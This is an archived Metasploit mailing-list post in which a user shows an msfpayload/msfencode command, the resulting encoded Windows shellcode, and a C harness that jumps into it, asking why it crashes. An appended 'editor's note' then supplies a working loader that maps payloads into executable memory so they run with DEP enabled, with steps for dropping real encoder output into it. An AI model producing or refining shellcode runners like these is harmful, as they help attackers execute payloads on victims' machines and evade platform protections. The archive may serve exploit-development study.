Metasploit mailing list archives
Using encoded payload in executable
From: c0r31mp4ct at gmail.com (C0r3 1mp4ct)
Date: Thu, 7 Jun 2007 10:43:17 +0200
Hi List!

I tried to use the output of

    ./msfpayload -e windows/x86/exec CMD=cmd EXITFUNC=process R | ./msfencode -e x86/avoid_utf8_tolower c

in a C program that executes it by simply transferring control to the string buffer containing the encoded payload. The payload is generated on Fedora Core 6.

Execution environment:
OS: XP Professional SP2, fully patched, DEP turned off
Compiler: LCC win32

The result is: "Access violation when reading [2F38247F]"

Could someone help me? What am I doing wrong?

Here is the program I compiled and tried to run:

    #include <stdio.h>
    #include <string.h>

    /* msfpayload windows/x86/exec CMD=cmd, encoded with x86/avoid_utf8_tolower */
    unsigned char buf[] =
    "\x6a\x1e\x6b\x3c\x24\x0b\x60\x03\x0c\x24\x6a\x11\x03\x0c\x24"
    "\x6a\x04\x68\x25\x7d\x30\x6d\x5f\x29\x39\x03\x0c\x24\x68\x61"
    "\x6e\x7c\x28\x5f\x29\x39\x03\x0c\x24\x68\x34\x12\x20\x04\x5f"
    "\x01\x39\x03\x0c\x24\x68\x02\x34\x6c\x7a\x5f\x29\x39\x03\x0c"
    "\x24\x68\x27\x04\x78\x5b\x5f\x01\x39\x03\x0c\x24\x68\x02\x0f"
    "\x72\x30\x5f\x29\x39\x03\x0c\x24\x68\x7f\x33\x7d\x29\x5f\x29"
    "\x39\x03\x0c\x24\x68\x78\x1b\x65\x60\x5f\x01\x39\x03\x0c\x24"
    "\x68\x7d\x12\x5e\x67\x5f\x01\x39\x03\x0c\x24\x68\x06\x63\x60"
    "\x02\x5f\x01\x39\x03\x0c\x24\x68\x0f\x5e\x3e\x12\x5f\x29\x39"
    "\x03\x0c\x24\x68\x03\x33\x18\x01\x5f\x01\x39\x03\x0c\x24\x68"
    "\x67\x73\x1e\x5e\x5f\x01\x39\x03\x0c\x24\x68\x17\x2c\x16\x16"
    "\x5f\x29\x39\x03\x0c\x24\x68\x66\x05\x1c\x16\x5f\x01\x39\x03"
    "\x0c\x24\x68\x11\x13\x23\x2a\x5f\x29\x39\x03\x0c\x24\x68\x7f"
    "\x3f\x78\x37\x5f\x29\x39\x03\x0c\x24\x68\x7e\x17\x31\x1e\x5f"
    "\x01\x39\x03\x0c\x24\x68\x02\x63\x04\x22\x5f\x01\x39\x03\x0c"
    "\x24\x68\x7f\x24\x38\x2f\x5f\x01\x39\x03\x0c\x24\x68\x2f\x35"
    "\x07\x6b\x5f\x01\x39\x03\x0c\x24\x68\x0f\x08\x1f\x67\x5f\x01"
    "\x39\x03\x0c\x24\x68\x1a\x31\x6d\x28\x5f\x01\x39\x03\x0c\x24"
    "\x68\x03\x2a\x7e\x1c\x5f\x01\x39\x03\x0c\x24\x68\x5d\x5c\x10"
    "\x2c\x5f\x01\x39\x03\x0c\x24\x68\x75\x61\x76\x63\x5f\x01\x39"
    "\x03\x0c\x24\x68\x2c\x77\x7f\x18\x5f\x01\x39\x03\x0c\x24\x68"
    "\x0d\x19\x0d\x21\x5f\x29\x39\x03\x0c\x24\x68\x19\x07\x04\x20"
    "\x5f\x29\x39\x03\x0c\x24\x68\x2d\x6d\x18\x30\x5f\x29\x39\x03"
    "\x0c\x24\x21\x66\x75\x6d\x61\x6e\x07\x6e\x08\x79\x5c\x01\x7a"
    "\x35\x5b\x06\x28\x14\x13\x04\x22\x10\x5d\x7a\x0a\x68\x08\x2b"
    "\x76\x16\x5b\x39\x2f\x72\x62\x0d\x01\x5e\x6a\x0b\x10\x20\x2a"
    "\x07\x38\x21\x0c\x03\x0e\x72\x6d\x01\x3b\x2d\x01\x7d\x25\x07"
    "\x2f\x75\x70\x2f\x24\x15\x0a\x5c\x03\x39\x6d\x72\x2b\x06\x02"
    "\x60\x5b\x0f\x77\x3c\x1e\x35\x5c\x11\x29\x20\x31\x04\x6c\x09"
    "\x02\x7c\x1e\x40\x05\x5f\x7a\x67\x63\x0e\x40\x3c\x09\x77\x6c"
    "\x10\x3c\x21\x7f\x72\x1b\x70\x0c\x09\x7c\x74\x68\x20\x37\x6d"
    "\x18\x30";

    int main(int argc, char *argv[])
    {
        /* Point a function pointer at the global buffer and call into it.
         * buf lives in the writable data segment, so this relies on DEP
         * being off, as in the environment described above. */
        void (*function)(void);
        function = (void (*)(void))buf;
        function();
        return 0;
    }

Any help would be appreciated! Thanks!

Regards:
c0r31mp4ct
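[Editor's note: the loader below is an added example, not code from this thread, from the poster, or from Metasploit. It shows the two checks a practitioner would want when dropping msfencode output into a C harness: that every byte actually satisfies the x86/avoid_utf8_tolower constraint (no NUL, nothing above 0x7f, no ASCII uppercase), and a way to run a payload from memory explicitly marked executable instead of jumping into a global char array, so the harness does not depend on DEP being off. The `demo_stub` bytes are a constructed "mov eax, 42; ret" test stub, not Metasploit output; `first_bad_byte`, `map_executable` and `run_demo_stub` are names chosen for this example. It says nothing about why the posted decoder faults.]

```c
#define _DEFAULT_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stddef.h>

#ifdef _WIN32
#include <windows.h>
#else
#include <sys/mman.h>
#endif

/* Charset the x86/avoid_utf8_tolower encoder promises: every byte in
 * 0x01..0x7f and no ASCII uppercase letter (0x41..0x5a), so the payload
 * survives a UTF-8 widening and a tolower() pass. Returns the index of
 * the first byte that breaks the rule, or -1 if the buffer is clean. */
long first_bad_byte(const unsigned char *p, size_t n)
{
    for (size_t i = 0; i < n; i++) {
        if (p[i] == 0x00 || p[i] > 0x7f) return (long)i;
        if (p[i] >= 'A' && p[i] <= 'Z') return (long)i;
    }
    return -1;
}

/* Copy a payload into a fresh anonymous mapping, then flip it to
 * read+execute. Writing first and changing protection afterwards avoids
 * asking for a W+X page, which hardened systems refuse. Returns NULL on
 * failure; release with unmap_executable(). */
void *map_executable(const unsigned char *code, size_t n)
{
#ifdef _WIN32
    DWORD old;
    void *mem = VirtualAlloc(NULL, n, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (!mem) return NULL;
    memcpy(mem, code, n);
    if (!VirtualProtect(mem, n, PAGE_EXECUTE_READ, &old)) {
        VirtualFree(mem, 0, MEM_RELEASE);
        return NULL;
    }
    FlushInstructionCache(GetCurrentProcess(), mem, n);
    return mem;
#else
    void *mem = mmap(NULL, n, PROT_READ | PROT_WRITE,
                     MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (mem == MAP_FAILED) return NULL;
    memcpy(mem, code, n);
    if (mprotect(mem, n, PROT_READ | PROT_EXEC) != 0) {
        munmap(mem, n);
        return NULL;
    }
    return mem;
#endif
}

void unmap_executable(void *mem, size_t n)
{
#ifdef _WIN32
    (void)n;
    VirtualFree(mem, 0, MEM_RELEASE);
#else
    munmap(mem, n);
#endif
}

/* Constructed test stub (not encoder output): "mov eax, 42 ; ret",
 * b8 2a 00 00 00 c3, valid on both i386 and x86-64. Its NUL bytes mean it
 * deliberately fails first_bad_byte(), which reports index 0 (0xb8 > 0x7f). */
static const unsigned char demo_stub[] = { 0xb8, 0x2a, 0x00, 0x00, 0x00, 0xc3 };

/* Map the stub executable and call it. Returns 42 on x86, -1 elsewhere
 * (the stub is x86 machine code) or if the mapping fails. */
int run_demo_stub(void)
{
#if defined(__x86_64__) || defined(__i386__) || defined(_M_X64) || defined(_M_IX86)
    int (*fn)(void);
    void *mem = map_executable(demo_stub, sizeof demo_stub);
    if (!mem) return -1;
    memcpy(&fn, &mem, sizeof fn);   /* object pointer -> function pointer */
    int ret = fn();
    unmap_executable(mem, sizeof demo_stub);
    return ret;
#else
    return -1;
#endif
}

int main(void)
{
    /* First six bytes of the payload posted above, used only as a sample
     * of encoder output for the charset check. */
    const unsigned char sample[] = "\x6a\x1e\x6b\x3c\x24\x0b";
    printf("first bad byte in sample: %ld\n", first_bad_byte(sample, sizeof sample - 1));
    printf("first bad byte in stub:   %ld\n", first_bad_byte(demo_stub, sizeof demo_stub));
    printf("stub returned %d\n", run_demo_stub());
    return 0;
}
```

To use it with real msfencode output, paste the `unsigned char buf[]` from the C output format in place of `demo_stub`, run `first_bad_byte(buf, sizeof buf - 1)` to confirm the encoder constraint held end to end (a stray uppercase or high byte after copy-and-paste is a common way to corrupt a decoder), and call through `map_executable` rather than into the global array. Jumping straight into `buf` executes from the program's data segment and only works while DEP is off, which is the setting the original post describes.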
Current thread:
- Using encoded payload in executable C0r3 1mp4ct (Jun 07)
- Using encoded payload in executable mmiller at hick.org (Jun 07)
- Using encoded payload in executable C0r3 1mp4ct (Jun 07)
- Using encoded payload in executable mmiller at hick.org (Jun 07)
- Using encoded payload in executable C0r3 1mp4ct (Jun 11)
- Using encoded payload in executable C0r3 1mp4ct (Jun 07)
- Using encoded payload in executable mmiller at hick.org (Jun 07)